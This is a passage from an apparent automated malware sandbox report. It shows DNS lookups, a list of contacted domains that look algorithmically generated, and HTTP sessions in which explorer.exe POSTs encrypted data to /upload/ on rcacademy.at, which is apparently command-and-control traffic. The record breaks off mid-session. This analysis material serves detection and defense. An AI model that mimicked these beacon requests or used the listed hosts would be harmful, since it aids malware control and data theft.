                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET8.8.8.8192.168.2.60x7edbNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET8.8.8.8192.168.2.60x1eedNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET8.8.8.8192.168.2.60x9e67No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET8.8.8.8192.168.2.60x1ff0No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET8.8.8.8192.168.2.60xa430No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET8.8.8.8192.168.2.60x1522No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET8.8.8.8192.168.2.60x5788No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET8.8.8.8192.168.2.60xc53dNo error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET8.8.8.8192.168.2.60x1e30No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET8.8.8.8192.168.2.60x41a8No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET8.8.8.8192.168.2.60x6fe8No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • cdn.discordapp.com
                                                                                                                                  • bastinscustomfab.com
                                                                                                                                  • www.bastinscustomfab.com
                                                                                                                                  • sbhfij.com
                                                                                                                                    • rcacademy.at
                                                                                                                                  • uexckctm.com
                                                                                                                                  • ydnswljr.org
                                                                                                                                  • vyedgkcsgg.org
                                                                                                                                  • rydxhqucb.net
                                                                                                                                  • uwbia.net
                                                                                                                                  • lwahbovc.org
                                                                                                                                  • uvqqrvitjv.net
                                                                                                                                  • pawqkjnqlq.net
                                                                                                                                  • vbely.org
                                                                                                                                  • wfquy.org
                                                                                                                                  • svlbtjow.org
                                                                                                                                  • nrenwf.com
                                                                                                                                  • kliyespolk.com
                                                                                                                                  • hjmjrvm.com
                                                                                                                                  • tvgdwnrq.net
                                                                                                                                  • bhqvtkcroe.net
                                                                                                                                  • wayrnqsako.net
                                                                                                                                  • ayamwyb.net
                                                                                                                                  • gffroy.org
                                                                                                                                  • ysuckj.com
                                                                                                                                  • qmchuh.org
                                                                                                                                  • tnsiunfk.net
                                                                                                                                  • ydbdqcx.org
                                                                                                                                  • myjlsdvf.org
                                                                                                                                  • jfeippj.org
                                                                                                                                  • dgwuv.com
                                                                                                                                  • lvxkwka.net
                                                                                                                                  • 45.9.20.240:7769
                                                                                                                                  • lbswig.net
                                                                                                                                  • rmxlxoqtyn.com
                                                                                                                                  • pwwgj.com
                                                                                                                                  • rwrqu.org
                                                                                                                                  • hetky.net
                                                                                                                                  • wadndxm.net
                                                                                                                                  • whrkpnnn.net
                                                                                                                                  • udjjtqdogg.org
                                                                                                                                  • cyvwwwlnbx.com
                                                                                                                                  • uwrfdbfbaa.org
                                                                                                                                  • 185.112.83.8
                                                                                                                                  • bvyrwnlgbc.com
                                                                                                                                  • vbwucidikt.net
                                                                                                                                  • hwmsuk.net
                                                                                                                                  • qkybqrxqpe.net
                                                                                                                                  • uaqwoemuq.org
                                                                                                                                  • nyexyommxu.net
                                                                                                                                  • jawmd.org
                                                                                                                                  • xefimpb.com
                                                                                                                                  • dppsna.com

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.649796162.159.134.233443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.64983050.62.140.96443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.649769222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:52.820661068 CET1194OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://uvqqrvitjv.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 195
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:52.820697069 CET1194OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2f 0c fa aa
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu/H8c\w_0X:K=>;l>y(#"`8ZDNYBF3/l&Q\DtgZ0
                                                                                                                                  Dec 18, 2021 15:31:53.983696938 CET1195INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:53 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.649770190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:54.313282967 CET1196OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pawqkjnqlq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 282
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:54.313328028 CET1196OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 39 2a bf e2
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu9*H8F<GoiPN[bKi!lG>XU`X t!$Fd,-pN{I'uL!*b}3e:D8h]~
                                                                                                                                  Dec 18, 2021 15:31:55.080066919 CET1269INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:54 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.649772190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:55.342674017 CET1276OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vbely.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 158
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:55.342686892 CET1276OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 02 d0 f9
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu*QET4U4#:K69dzF%I9mHU(At/'
                                                                                                                                  Dec 18, 2021 15:31:56.356654882 CET5301INHTTP/1.1 200 OK
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:55 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.649782148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:57.089059114 CET10351OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wfquy.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
